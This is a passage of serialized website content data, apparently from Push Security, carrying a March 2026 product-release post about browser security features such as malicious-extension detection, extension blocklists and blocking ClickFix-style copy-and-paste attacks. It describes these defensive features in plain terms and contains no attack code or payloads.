deType":1888,"data":12156,"content":12157},{},[12158],{"nodeType":1258,"data":12159,"content":12160},{},[12161,12165],{"nodeType":1257,"value":2873,"marks":12162,"data":12164},[12163],{"type":1318},{},{"nodeType":1257,"value":2878,"marks":12166,"data":12167},[],{},{"nodeType":1888,"data":12169,"content":12170},{},[12171],{"nodeType":1258,"data":12172,"content":12173},{},[12174,12178],{"nodeType":1257,"value":2888,"marks":12175,"data":12177},[12176],{"type":1318},{},{"nodeType":1257,"value":2893,"marks":12179,"data":12180},[],{},{"nodeType":1258,"data":12182,"content":12183},{},[12184],{"nodeType":1257,"value":2900,"marks":12185,"data":12186},[],{},{"nodeType":1258,"data":12188,"content":12189},{},[12190],{"nodeType":1257,"value":2907,"marks":12191,"data":12192},[],{},{"nodeType":1335,"data":12194,"content":12197},{"target":12195},{"sys":12196},{"id":2914,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12199,"content":12200},{},[12201],{"nodeType":1257,"value":2920,"marks":12202,"data":12203},[],{},{"nodeType":1335,"data":12205,"content":12208},{"target":12206},{"sys":12207},{"id":2927,"type":1340,"linkType":1341},[],{"nodeType":1468,"data":12210,"content":12211},{},[12212],{"nodeType":1257,"value":2933,"marks":12213,"data":12215},[12214],{"type":1318},{},{"nodeType":1258,"data":12217,"content":12218},{},[12219,12222,12229],{"nodeType":1257,"value":2941,"marks":12220,"data":12221},[],{},{"nodeType":1364,"data":12223,"content":12224},{"uri":2946},[12225],{"nodeType":1257,"value":2949,"marks":12226,"data":12228},[12227],{"type":1372},{},{"nodeType":1257,"value":2954,"marks":12230,"data":12231},[],{},{"nodeType":1258,"data":12233,"content":12234},{},[12235],{"nodeType":1257,"value":2961,"marks":12236,"data":12237},[],{},{"nodeType":1884,"data":12239,"content":12240},{},[12241,12250,12259],{"nodeType":1888,"data":12242,"content":12243},{},[12244],{"nodeType":1258,"data":12245,"content":12246},{},[12247],{"nodeType":1257,"value":2974,"marks":12248,"data":12249},[],{},{"nodeType":1888,"data":12251,"content":12252},{},[12253],{"nodeType":1258,"data":12254,"content":12255},{},[12256],{"nodeType":1257,"value":2984,"marks":12257,"data":12258},[],{},{"nodeType":1888,"data":12260,"content":12261},{},[12262],{"nodeType":1258,"data":12263,"content":12264},{},[12265],{"nodeType":1257,"value":2994,"marks":12266,"data":12267},[],{},{"nodeType":1258,"data":12269,"content":12270},{},[12271],{"nodeType":1257,"value":3001,"marks":12272,"data":12273},[],{},{"nodeType":1884,"data":12275,"content":12276},{},[12277,12286,12295],{"nodeType":1888,"data":12278,"content":12279},{},[12280],{"nodeType":1258,"data":12281,"content":12282},{},[12283],{"nodeType":1257,"value":3014,"marks":12284,"data":12285},[],{},{"nodeType":1888,"data":12287,"content":12288},{},[12289],{"nodeType":1258,"data":12290,"content":12291},{},[12292],{"nodeType":1257,"value":3024,"marks":12293,"data":12294},[],{},{"nodeType":1888,"data":12296,"content":12297},{},[12298],{"nodeType":1258,"data":12299,"content":12300},{},[12301],{"nodeType":1257,"value":3034,"marks":12302,"data":12303},[],{},{"nodeType":1307,"data":12305,"content":12306},{},[],{"nodeType":1311,"data":12308,"content":12309},{},[12310],{"nodeType":1257,"value":3044,"marks":12311,"data":12313},[12312],{"type":1318},{},{"nodeType":1258,"data":12315,"content":12316},{},[12317],{"nodeType":1257,"value":3052,"marks":12318,"data":12319},[],{},{"nodeType":1335,"data":12321,"content":12324},{"target":12322},{"sys":12323},{"id":3059,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12326,"content":12327},{},[12328,12331,12338],{"nodeType":1257,"value":3065,"marks":12329,"data":12330},[],{},{"nodeType":1364,"data":12332,"content":12333},{"uri":2681},[12334],{"nodeType":1257,"value":3072,"marks":12335,"data":12337},[12336],{"type":1372},{},{"nodeType":1257,"value":3077,"marks":12339,"data":12340},[],{},{"nodeType":1258,"data":12342,"content":12343},{},[12344],{"nodeType":1257,"value":3084,"marks":12345,"data":12346},[],{},{"nodeType":1258,"data":12348,"content":12349},{},[12350,12353,12360,12363,12370],{"nodeType":1257,"value":2223,"marks":12351,"data":12352},[],{},{"nodeType":1364,"data":12354,"content":12355},{"uri":2228},[12356],{"nodeType":1257,"value":2231,"marks":12357,"data":12359},[12358],{"type":1372},{},{"nodeType":1257,"value":2236,"marks":12361,"data":12362},[],{},{"nodeType":1364,"data":12364,"content":12365},{"uri":2241},[12366],{"nodeType":1257,"value":2244,"marks":12367,"data":12369},[12368],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":12371,"data":12372},[],{},{"nodeType":1335,"data":12374,"content":12377},{"target":12375},{"sys":12376},{"id":3117,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12379,"content":12380},{},[12381],{"nodeType":1257,"value":31,"marks":12382,"data":12383},[],{},{"items":12385},[12386,12388],{"sys":12387,"name":1270},{"id":1269},{"sys":12389,"name":1274},{"id":1273},{"items":12391},[12392],{"fullName":3138,"firstName":3139,"jobTitle":3140,"profilePicture":12393},{"url":3142},{"__typename":1278,"sys":12395,"content":12396,"title":3763,"synopsis":3764,"hashTags":118,"publishedDate":3765,"slug":3766,"tagsCollection":12919,"authorsCollection":12925},{"id":3145},{"json":12397},{"nodeType":1259,"data":12398,"content":12399},{},[12400,12416,12422,12428,12431,12438,12454,12470,12497,12502,12505,12512,12519,12525,12541,12547,12552,12557,12563,12569,12576,12582,12588,12593,12599,12615,12622,12628,12634,12650,12655,12671,12676,12682,12687,12690,12697,12703,12719,12725,12748,12754,12761,12764,12771,12777,12783,12788,12794,12833,12838,12844,12870,12875,12913],{"nodeType":1258,"data":12401,"content":12402},{},[12403,12406,12413],{"nodeType":1257,"value":31,"marks":12404,"data":12405},[],{},{"nodeType":1364,"data":12407,"content":12408},{"uri":3158},[12409],{"nodeType":1257,"value":3161,"marks":12410,"data":12412},[12411],{"type":1372},{},{"nodeType":1257,"value":3166,"marks":12414,"data":12415},[],{},{"nodeType":1258,"data":12417,"content":12418},{},[12419],{"nodeType":1257,"value":3173,"marks":12420,"data":12421},[],{},{"nodeType":1258,"data":12423,"content":12424},{},[12425],{"nodeType":1257,"value":3180,"marks":12426,"data":12427},[],{},{"nodeType":1307,"data":12429,"content":12430},{},[],{"nodeType":1311,"data":12432,"content":12433},{},[12434],{"nodeType":1257,"value":3190,"marks":12435,"data":12437},[12436],{"type":1318},{},{"nodeType":1258,"data":12439,"content":12440},{},[12441,12444,12451],{"nodeType":1257,"value":3198,"marks":12442,"data":12443},[],{},{"nodeType":1364,"data":12445,"content":12446},{"uri":3203},[12447],{"nodeType":1257,"value":3206,"marks":12448,"data":12450},[12449],{"type":1372},{},{"nodeType":1257,"value":3211,"marks":12452,"data":12453},[],{},{"nodeType":1258,"data":12455,"content":12456},{},[12457,12460,12467],{"nodeType":1257,"value":3218,"marks":12458,"data":12459},[],{},{"nodeType":1364,"data":12461,"content":12462},{"uri":1696},[12463],{"nodeType":1257,"value":3225,"marks":12464,"data":12466},[12465],{"type":1372},{},{"nodeType":1257,"value":3230,"marks":12468,"data":12469},[],{},{"nodeType":1258,"data":12471,"content":12472},{},[12473,12476,12480,12483,12487,12490,12494],{"nodeType":1257,"value":3237,"marks":12474,"data":12475},[],{},{"nodeType":1257,"value":3241,"marks":12477,"data":12479},[12478],{"type":1318},{},{"nodeType":1257,"value":3246,"marks":12481,"data":12482},[],{},{"nodeType":1257,"value":3250,"marks":12484,"data":12486},[12485],{"type":1318},{},{"nodeType":1257,"value":3255,"marks":12488,"data":12489},[],{},{"nodeType":1257,"value":3259,"marks":12491,"data":12493},[12492],{"type":1318},{},{"nodeType":1257,"value":3264,"marks":12495,"data":12496},[],{},{"nodeType":1335,"data":12498,"content":12501},{"target":12499},{"sys":12500},{"id":3271,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":12503,"content":12504},{},[],{"nodeType":1311,"data":12506,"content":12507},{},[12508],{"nodeType":1257,"value":3280,"marks":12509,"data":12511},[12510],{"type":1318},{},{"nodeType":1468,"data":12513,"content":12514},{},[12515],{"nodeType":1257,"value":3288,"marks":12516,"data":12518},[12517],{"type":1318},{},{"nodeType":1258,"data":12520,"content":12521},{},[12522],{"nodeType":1257,"value":3296,"marks":12523,"data":12524},[],{},{"nodeType":1258,"data":12526,"content":12527},{},[12528,12531,12538],{"nodeType":1257,"value":31,"marks":12529,"data":12530},[],{},{"nodeType":1364,"data":12532,"content":12533},{"uri":3158},[12534],{"nodeType":1257,"value":3309,"marks":12535,"data":12537},[12536],{"type":1372},{},{"nodeType":1257,"value":3314,"marks":12539,"data":12540},[],{},{"nodeType":1258,"data":12542,"content":12543},{},[12544],{"nodeType":1257,"value":3321,"marks":12545,"data":12546},[],{},{"nodeType":1335,"data":12548,"content":12551},{"target":12549},{"sys":12550},{"id":1454,"type":1340,"linkType":1341},[],{"nodeType":1335,"data":12553,"content":12556},{"target":12554},{"sys":12555},{"id":3333,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12558,"content":12559},{},[12560],{"nodeType":1257,"value":3339,"marks":12561,"data":12562},[],{},{"nodeType":1258,"data":12564,"content":12565},{},[12566],{"nodeType":1257,"value":3346,"marks":12567,"data":12568},[],{},{"nodeType":1468,"data":12570,"content":12571},{},[12572],{"nodeType":1257,"value":3353,"marks":12573,"data":12575},[12574],{"type":1318},{},{"nodeType":1258,"data":12577,"content":12578},{},[12579],{"nodeType":1257,"value":3361,"marks":12580,"data":12581},[],{},{"nodeType":1258,"data":12583,"content":12584},{},[12585],{"nodeType":1257,"value":3368,"marks":12586,"data":12587},[],{},{"nodeType":1335,"data":12589,"content":12592},{"target":12590},{"sys":12591},{"id":3375,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12594,"content":12595},{},[12596],{"nodeType":1257,"value":3381,"marks":12597,"data":12598},[],{},{"nodeType":1258,"data":12600,"content":12601},{},[12602,12605,12612],{"nodeType":1257,"value":3388,"marks":12603,"data":12604},[],{},{"nodeType":1364,"data":12606,"content":12607},{"uri":3393},[12608],{"nodeType":1257,"value":3396,"marks":12609,"data":12611},[12610],{"type":1372},{},{"nodeType":1257,"value":3401,"marks":12613,"data":12614},[],{},{"nodeType":1468,"data":12616,"content":12617},{},[12618],{"nodeType":1257,"value":3408,"marks":12619,"data":12621},[12620],{"type":1318},{},{"nodeType":1258,"data":12623,"content":12624},{},[12625],{"nodeType":1257,"value":3416,"marks":12626,"data":12627},[],{},{"nodeType":1258,"data":12629,"content":12630},{},[12631],{"nodeType":1257,"value":3423,"marks":12632,"data":12633},[],{},{"nodeType":1258,"data":12635,"content":12636},{},[12637,12640,12647],{"nodeType":1257,"value":3430,"marks":12638,"data":12639},[],{},{"nodeType":1364,"data":12641,"content":12642},{"uri":3435},[12643],{"nodeType":1257,"value":3438,"marks":12644,"data":12646},[12645],{"type":1372},{},{"nodeType":1257,"value":3443,"marks":12648,"data":12649},[],{},{"nodeType":1335,"data":12651,"content":12654},{"target":12652},{"sys":12653},{"id":3450,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12656,"content":12657},{},[12658,12661,12668],{"nodeType":1257,"value":3456,"marks":12659,"data":12660},[],{},{"nodeType":1364,"data":12662,"content":12663},{"uri":3461},[12664],{"nodeType":1257,"value":3464,"marks":12665,"data":12667},[12666],{"type":1372},{},{"nodeType":1257,"value":3469,"marks":12669,"data":12670},[],{},{"nodeType":1335,"data":12672,"content":12675},{"target":12673},{"sys":12674},{"id":3476,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12677,"content":12678},{},[12679],{"nodeType":1257,"value":3482,"marks":12680,"data":12681},[],{},{"nodeType":1335,"data":12683,"content":12686},{"target":12684},{"sys":12685},{"id":3489,"type":1340,"linkType":1341},[],{"nodeType":1307,"data":12688,"content":12689},{},[],{"nodeType":1311,"data":12691,"content":12692},{},[12693],{"nodeType":1257,"value":3498,"marks":12694,"data":12696},[12695],{"type":1318},{},{"nodeType":1258,"data":12698,"content":12699},{},[12700],{"nodeType":1257,"value":3506,"marks":12701,"data":12702},[],{},{"nodeType":1258,"data":12704,"content":12705},{},[12706,12709,12716],{"nodeType":1257,"value":3513,"marks":12707,"data":12708},[],{},{"nodeType":1364,"data":12710,"content":12711},{"uri":3518},[12712],{"nodeType":1257,"value":2684,"marks":12713,"data":12715},[12714],{"type":1372},{},{"nodeType":1257,"value":3525,"marks":12717,"data":12718},[],{},{"nodeType":1258,"data":12720,"content":12721},{},[12722],{"nodeType":1257,"value":3532,"marks":12723,"data":12724},[],{},{"nodeType":1258,"data":12726,"content":12727},{},[12728,12731,12735,12738,12745],{"nodeType":1257,"value":3539,"marks":12729,"data":12730},[],{},{"nodeType":1257,"value":3543,"marks":12732,"data":12734},[12733],{"type":1318},{},{"nodeType":1257,"value":3548,"marks":12736,"data":12737},[],{},{"nodeType":1364,"data":12739,"content":12740},{"uri":3553},[12741],{"nodeType":1257,"value":3556,"marks":12742,"data":12744},[12743],{"type":1372},{},{"nodeType":1257,"value":3561,"marks":12746,"data":12747},[],{},{"nodeType":1258,"data":12749,"content":12750},{},[12751],{"nodeType":1257,"value":3568,"marks":12752,"data":12753},[],{},{"nodeType":1258,"data":12755,"content":12756},{},[12757],{"nodeType":1257,"value":3575,"marks":12758,"data":12760},[12759],{"type":1318},{},{"nodeType":1307,"data":12762,"content":12763},{},[],{"nodeType":1311,"data":12765,"content":12766},{},[12767],{"nodeType":1257,"value":3586,"marks":12768,"data":12770},[12769],{"type":1318},{},{"nodeType":1258,"data":12772,"content":12773},{},[12774],{"nodeType":1257,"value":3594,"marks":12775,"data":12776},[],{},{"nodeType":1258,"data":12778,"content":12779},{},[12780],{"nodeType":1257,"value":3601,"marks":12781,"data":12782},[],{},{"nodeType":1335,"data":12784,"content":12787},{"target":12785},{"sys":12786},{"id":3608,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12789,"content":12790},{},[12791],{"nodeType":1257,"value":3614,"marks":12792,"data":12793},[],{},{"nodeType":1884,"data":12795,"content":12796},{},[12797,12815],{"nodeType":1888,"data":12798,"content":12799},{},[12800],{"nodeType":1258,"data":12801,"content":12802},{},[12803,12806,12812],{"nodeType":1257,"value":31,"marks":12804,"data":12805},[],{},{"nodeType":1364,"data":12807,"content":12808},{"uri":3631},[12809],{"nodeType":1257,"value":3634,"marks":12810,"data":12811},[],{},{"nodeType":1257,"value":3638,"marks":12813,"data":12814},[],{},{"nodeType":1888,"data":12816,"content":12817},{},[12818],{"nodeType":1258,"data":12819,"content":12820},{},[12821,12824,12830],{"nodeType":1257,"value":31,"marks":12822,"data":12823},[],{},{"nodeType":1364,"data":12825,"content":12826},{"uri":3652},[12827],{"nodeType":1257,"value":3655,"marks":12828,"data":12829},[],{},{"nodeType":1257,"value":3659,"marks":12831,"data":12832},[],{},{"nodeType":1335,"data":12834,"content":12837},{"target":12835},{"sys":12836},{"id":3666,"type":1340,"linkType":1341},[],{"nodeType":1258,"data":12839,"content":12840},{},[12841],{"nodeType":1257,"value":3672,"marks":12842,"data":12843},[],{},{"nodeType":1258,"data":12845,"content":12846},{},[12847,12850,12857,12860,12867],{"nodeType":1257,"value":3679,"marks":12848,"data":12849},[],{},{"nodeType":1364,"data":12851,"content":12852},{"uri":3684},[12853],{"nodeType":1257,"value":3687,"marks":12854,"data":12856},[12855],{"type":1372},{},{"nodeType":1257,"value":3692,"marks":12858,"data":12859},[],{},{"nodeType":1364,"data":12861,"content":12862},{"uri":1804},[12863],{"nodeType":1257,"value":3699,"marks":12864,"data":12866},[12865],{"type":1372},{},{"nodeType":1257,"value":3704,"marks":12868,"data":12869},[],{},{"nodeType":1335,"data":12871,"content":12874},{"target":12872},{"sys":12873},{"id":3711,"type":1340,"linkType":1341},[],{"nodeType":3714,"data":12876,"content":12877},{},[12878],{"nodeType":1258,"data":12879,"content":12880},{},[12881,12884,12891,12894,12900,12903,12910],{"nodeType":1257,"value":3721,"marks":12882,"data":12883},[],{},{"nodeType":1364,"data":12885,"content":12886},{"uri":2228},[12887],{"nodeType":1257,"value":3728,"marks":12888,"data":12890},[12889],{"type":1372},{},{"nodeType":1257,"value":3548,"marks":12892,"data":12893},[],{},{"nodeType":1364,"data":12895,"content":12896},{"uri":3737},[12897],{"nodeType":1257,"value":3740,"marks":12898,"data":12899},[],{},{"nodeType":1257,"value":3744,"marks":12901,"data":12902},[],{},{"nodeType":1364,"data":12904,"content":12905},{"uri":2241},[12906],{"nodeType":1257,"value":2244,"marks":12907,"data":12909},[12908],{"type":1372},{},{"nodeType":1257,"value":2249,"marks":12911,"data":12912},[],{},{"nodeType":1258,"data":12914,"content":12915},{},[12916],{"nodeType":1257,"value":31,"marks":12917,"data":12918},[],{},{"items":12920},[12921,12923],{"sys":12922,"name":1270},{"id":1269},{"sys":12924,"name":1274},{"id":1273},{"items":12926},[12927],{"fullName":2265,"firstName":2266,"jobTitle":2267,"profilePicture":12928},{"url":2269},"content:blog:stryker-handala-report.json","blog/stryker-handala-report.json","blog/stryker-handala-report",{"_path":12933,"_dir":1242,"_draft":6,"_partial":6,"_locale":31,"sys":12934,"ogImage":118,"summary":12937,"title":12948,"subtitle":118,"metaTitle":12949,"synopsis":12950,"hashTags":118,"publishedDate":12951,"slug":12952,"tagsCollection":12953,"authorsCollection":12959,"content":12967,"relatedBlogPostsCollection":13526,"_id":14247,"_type":6653,"_source":6654,"_file":14248,"_stem":14249,"_extension":6653},"/blog/product-release-march-2026",{"id":12935,"publishedAt":12936},"3Yw48rVLntipUijLR0CYf2","2026-03-10T20:32:25.404Z",{"json":12938},{"data":12939,"content":12940,"nodeType":1259},{},[12941],{"data":12942,"content":12943,"nodeType":1258},{},[12944],{"data":12945,"marks":12946,"value":12947,"nodeType":1257},{},[],"Malicious extension detection, block ClickFix-style attacks, custom branding and more","Product release: March 2026","Push Security new product features for March 2026","Here’s what’s new on the Push platform for March 2026.","2026-03-10T00:00:00.000Z","product-release-march-2026",{"items":12954},[12955],{"sys":12956,"name":12958},{"id":12957},"5jk0kqjSdSK2L0YiistQjY","Release notes",{"items":12960},[12961],{"fullName":12962,"firstName":12963,"jobTitle":12964,"profilePicture":12965},"Andy Waugh","Andy","VP Product",{"url":12966},"https://images.ctfassets.net/y1cdw1ablpvd/3Rf76rJn6S9inMb4dUnAIJ/0a787f8141d05b95300e2fe77c4493fa/DSC_6868.jpg",{"json":12968,"links":13469},{"data":12969,"content":12970,"nodeType":1259},{},[12971,12978,13041,13048,13055,13071,13087,13093,13113,13119,13135,13142,13148,13166,13172,13193,13226,13244,13250,13257,13272,13278,13296,13302,13309,13333,13358,13376,13383,13390,13463],{"data":12972,"content":12973,"nodeType":1311},{},[12974],{"data":12975,"marks":12976,"value":12977,"nodeType":1257},{},[],"What's new this month:",{"data":12979,"content":12980,"nodeType":1884},{},[12981,12991,13001,13011,13021,13031],{"data":12982,"content":12983,"nodeType":1888},{},[12984],{"data":12985,"content":12986,"nodeType":1258},{},[12987],{"data":12988,"marks":12989,"value":12990,"nodeType":1257},{},[],"Detect malicious browser extensions",{"data":12992,"content":12993,"nodeType":1888},{},[12994],{"data":12995,"content":12996,"nodeType":1258},{},[12997],{"data":12998,"marks":12999,"value":13000,"nodeType":1257},{},[],"Create a blocklist or allowlist for browser extensions",{"data":13002,"content":13003,"nodeType":1888},{},[13004],{"data":13005,"content":13006,"nodeType":1258},{},[13007],{"data":13008,"marks":13009,"value":13010,"nodeType":1257},{},[],"Block ClickFix-style attacks and collect payloads for investigation",{"data":13012,"content":13013,"nodeType":1888},{},[13014],{"data":13015,"content":13016,"nodeType":1258},{},[13017],{"data":13018,"marks":13019,"value":13020,"nodeType":1257},{},[],"Custom branding for employee-facing banners and block pages",{"data":13022,"content":13023,"nodeType":1888},{},[13024],{"data":13025,"content":13026,"nodeType":1258},{},[13027],{"data":13028,"marks":13029,"value":13030,"nodeType":1257},{},[],"Collect additional metadata to support threat detection",{"data":13032,"content":13033,"nodeType":1888},{},[13034],{"data":13035,"content":13036,"nodeType":1258},{},[13037],{"data":13038,"marks":13039,"value":13040,"nodeType":1257},{},[],"And a few other things … ",{"data":13042,"content":13043,"nodeType":1311},{},[13044],{"data":13045,"marks":13046,"value":13047,"nodeType":1257},{},[],"Detect malicious extensions",{"data":13049,"content":13050,"nodeType":1258},{},[13051],{"data":13052,"marks":13053,"value":13054,"nodeType":1257},{},[],"Push can now detect and block malicious browser extensions found in your environment. ",{"data":13056,"content":13057,"nodeType":1258},{},[13058,13062,13067],{"data":13059,"marks":13060,"value":13061,"nodeType":1257},{},[],"Push maintains a global list of malicious extensions based on our own threat research and publicly available threat intelligence. When an extension in your environment matches a malicious extension ID, Push will raise a detection on the ",{"data":13063,"marks":13064,"value":13066,"nodeType":1257},{},[13065],{"type":1318},"Detections",{"data":13068,"marks":13069,"value":13070,"nodeType":1257},{},[]," page of the Push admin console. You can also configure the control to warn or block users automatically.",{"data":13072,"content":13073,"nodeType":1258},{},[13074,13078,13083],{"data":13075,"marks":13076,"value":13077,"nodeType":1257},{},[],"To enable malicious extension detection, go to the ",{"data":13079,"marks":13080,"value":13082,"nodeType":1257},{},[13081],{"type":1318},"Controls",{"data":13084,"marks":13085,"value":13086,"nodeType":1257},{},[]," page in the Push admin console. ",{"data":13088,"content":13092,"nodeType":1335},{"target":13089},{"sys":13090},{"id":13091,"type":1340,"linkType":1341},"1QV5UQ04MYLpWY7jTocvO4",[],{"data":13094,"content":13095,"nodeType":1258},{},[13096,13099,13110],{"data":13097,"marks":13098,"value":31,"nodeType":1257},{},[],{"data":13100,"content":13104,"nodeType":13109},{"target":13101},{"sys":13102},{"id":13103,"type":1340,"linkType":1341},"5NyiWgjMDwk16XZ0S681JK",[13105],{"data":13106,"marks":13107,"value":13108,"nodeType":1257},{},[],"Learn more","entry-hyperlink",{"data":13111,"marks":13112,"value":31,"nodeType":1257},{},[],{"data":13114,"content":13115,"nodeType":1311},{},[13116],{"data":13117,"marks":13118,"value":13000,"nodeType":1257},{},[],{"data":13120,"content":13121,"nodeType":1258},{},[13122,13126,13131],{"data":13123,"marks":13124,"value":13125,"nodeType":1257},{},[],"You can also block unwanted extensions or allowlist only the extensions you want in your environment, using Push’s ",{"data":13127,"marks":13128,"value":13130,"nodeType":1257},{},[13129],{"type":1318},"Browser extension blocking",{"data":13132,"marks":13133,"value":13134,"nodeType":1257},{},[]," control.",{"data":13136,"content":13137,"nodeType":1258},{},[13138],{"data":13139,"marks":13140,"value":13141,"nodeType":1257},{},[],"End-users will see a block page if they attempt to enable a blocked extension or install one via the Chrome or Microsoft extension stores.",{"data":13143,"content":13147,"nodeType":1335},{"target":13144},{"sys":13145},{"id":13146,"type":1340,"linkType":1341},"3OCdGfsyNTLXQx77dwzY9L",[],{"data":13149,"content":13150,"nodeType":1258},{},[13151,13154,13163],{"data":13152,"marks":13153,"value":31,"nodeType":1257},{},[],{"data":13155,"content":13159,"nodeType":13109},{"target":13156},{"sys":13157},{"id":13158,"type":1340,"linkType":1341},"3ibVBa6u0XfcXXDVtON5th",[13160],{"data":13161,"marks":13162,"value":13108,"nodeType":1257},{},[],{"data":13164,"marks":13165,"value":31,"nodeType":1257},{},[],{"data":13167,"content":13168,"nodeType":1311},{},[13169],{"data":13170,"marks":13171,"value":13010,"nodeType":1257},{},[],{"data":13173,"content":13174,"nodeType":1258},{},[13175,13179,13189],{"data":13176,"marks":13177,"value":13178,"nodeType":1257},{},[],"You can now block ClickFix-style malicious copy and paste attacks using Push. These are one of the ",{"data":13180,"content":13184,"nodeType":13109},{"target":13181},{"sys":13182},{"id":13183,"type":1340,"linkType":1341},"1u8RJxC00HbBhCBVxcDnkK",[13185],{"data":13186,"marks":13187,"value":13188,"nodeType":1257},{},[],"fastest-growing",{"data":13190,"marks":13191,"value":13192,"nodeType":1257},{},[]," browser-based attacks. You can also choose to collect the payload for your security team to investigate.",{"data":13194,"content":13195,"nodeType":1258},{},[13196,13200,13205,13209,13214,13217,13222],{"data":13197,"marks":13198,"value":13199,"nodeType":1257},{},[],"From the Push admin console, go to ",{"data":13201,"marks":13202,"value":13204,"nodeType":1257},{},[13203],{"type":1318},"Controls > Malicious copy and paste detection",{"data":13206,"marks":13207,"value":13208,"nodeType":1257},{},[],". Then create a configuration rule to select the ",{"data":13210,"marks":13211,"value":13213,"nodeType":1257},{},[13212],{"type":1318},"Mode",{"data":13215,"marks":13216,"value":1703,"nodeType":1257},{},[],{"data":13218,"marks":13219,"value":13221,"nodeType":1257},{},[13220],{"type":1318},"Scope",{"data":13223,"marks":13224,"value":13225,"nodeType":1257},{},[],". If you’ve enabled payload collection, Push will collect the malicious payload and include it in the detection event.",{"data":13227,"content":13228,"nodeType":1258},{},[13229,13232,13241],{"data":13230,"marks":13231,"value":31,"nodeType":1257},{},[],{"data":13233,"content":13237,"nodeType":13109},{"target":13234},{"sys":13235},{"id":13236,"type":1340,"linkType":1341},"7jygmadjoz0asAHv7e5PuK",[13238],{"data":13239,"marks":13240,"value":13108,"nodeType":1257},{},[],{"data":13242,"marks":13243,"value":31,"nodeType":1257},{},[],{"data":13245,"content":13246,"nodeType":1311},{},[13247],{"data":13248,"marks":13249,"value":13020,"nodeType":1257},{},[],{"data":13251,"content":13252,"nodeType":1258},{},[13253],{"data":13254,"marks":13255,"value":13256,"nodeType":1257},{},[],"Customize the look and feel of employee-facing banners and warn or block pages by adding your company logo, accent color, and choice of light or dark mode themes. ",{"data":13258,"content":13259,"nodeType":1258},{},[13260,13264,13269],{"data":13261,"marks":13262,"value":13263,"nodeType":1257},{},[],"To add your brand elements, go to ",{"data":13265,"marks":13266,"value":13268,"nodeType":1257},{},[13267],{"type":1318},"Settings > Branding",{"data":13270,"marks":13271,"value":2249,"nodeType":1257},{},[],{"data":13273,"content":13277,"nodeType":1335},{"target":13274},{"sys":13275},{"id":13276,"type":1340,"linkType":1341},"3Jawd7IBSA3GF2XBHARsn",[],{"data":13279,"content":13280,"nodeType":1258},{},[13281,13284,13293],{"data":13282,"marks":13283,"value":31,"nodeType":1257},{},[],{"data":13285,"content":13289,"nodeType":13109},{"target":13286},{"sys":13287},{"id":13288,"type":1340,"linkType":1341},"4i1KWgBfYqtFYlUFRYiGdW",[13290],{"data":13291,"marks":13292,"value":13108,"nodeType":1257},{},[],{"data":13294,"marks":13295,"value":31,"nodeType":1257},{},[],{"data":13297,"content":13298,"nodeType":1311},{},[13299],{"data":13300,"marks":13301,"value":13030,"nodeType":1257},{},[],{"data":13303,"content":13304,"nodeType":1258},{},[13305],{"data":13306,"marks":13307,"value":13308,"nodeType":1257},{},[],"The Push browser extension can now collect additional metadata and store it locally for up to 30 days, powering more diverse and precise detections, including for emerging threats. ",{"data":13310,"content":13311,"nodeType":1258},{},[13312,13316,13320,13324,13329],{"data":13313,"marks":13314,"value":13315,"nodeType":1257},{},[],"Detections informed by this metadata will be raised on the ",{"data":13317,"marks":13318,"value":13066,"nodeType":1257},{},[13319],{"type":1318},{"data":13321,"marks":13322,"value":13323,"nodeType":1257},{},[]," page. Note that these detections do not block end-user activity and are ",{"data":13325,"marks":13326,"value":13328,"nodeType":1257},{},[13327],{"type":1318},"Monitor",{"data":13330,"marks":13331,"value":13332,"nodeType":1257},{},[]," mode only.",{"data":13334,"content":13335,"nodeType":1258},{},[13336,13340,13345,13349,13354],{"data":13337,"marks":13338,"value":13339,"nodeType":1257},{},[],"We recommend you enable ",{"data":13341,"marks":13342,"value":13344,"nodeType":1257},{},[13343],{"type":1318},"Browser event storage",{"data":13346,"marks":13347,"value":13348,"nodeType":1257},{},[]," to take advantage of this capability. Go to ",{"data":13350,"marks":13351,"value":13353,"nodeType":1257},{},[13352],{"type":1318},"Settings > Telemetry > Browser event storage",{"data":13355,"marks":13356,"value":13357,"nodeType":1257},{},[]," in the admin console.",{"data":13359,"content":13360,"nodeType":1258},{},[13361,13364,13373],{"data":13362,"marks":13363,"value":31,"nodeType":1257},{},[],{"data":13365,"content":13369,"nodeType":13109},{"target":13366},{"sys":13367},{"id":13368,"type":1340,"linkType":1341},"1x69JxXcDWEDIzYXUM8nGb",[13370],{"data":13371,"marks":13372,"value":13108,"nodeType":1257},{},[],{"data":13374,"marks":13375,"value":31,"nodeType":1257},{},[],{"data":13377,"content":13378,"nodeType":1311},{},[13379],{"data":13380,"marks":13381,"value":13382,"nodeType":1257},{},[],"And a few other things ...",{"data":13384,"content":13385,"nodeType":1258},{},[13386],{"data":13387,"marks":13388,"value":13389,"nodeType":1257},{},[],"Other new features or improvements to the platform include:",{"data":13391,"content":13392,"nodeType":1884},{},[13393,13413,13423,13443],{"data":13394,"content":13395,"nodeType":1888},{},[13396],{"data":13397,"content":13398,"nodeType":1258},{},[13399,13403,13410],{"data":13400,"marks":13401,"value":13402,"nodeType":1257},{},[],"You can now configure the frequency with which app banners will be displayed: either per-tab or per-browser. ",{"data":13404,"content":13406,"nodeType":1364},{"uri":13405},"/help/10125#frequency",[13407],{"data":13408,"marks":13409,"value":13108,"nodeType":1257},{},[],{"data":13411,"marks":13412,"value":31,"nodeType":1257},{},[],{"data":13414,"content":13415,"nodeType":1888},{},[13416],{"data":13417,"content":13418,"nodeType":1258},{},[13419],{"data":13420,"marks":13421,"value":13422,"nodeType":1257},{},[],"You can now define an Owner role as part of Push’s RBAC options. Only Owners can edit roles, delete your team (e.g. tenant), change default SAML roles, or update your team name.",{"data":13424,"content":13425,"nodeType":1888},{},[13426],{"data":13427,"content":13428,"nodeType":1258},{},[13429,13433,13440],{"data":13430,"marks":13431,"value":13432,"nodeType":1257},{},[],"Webhook events now include detection details, for greater context. 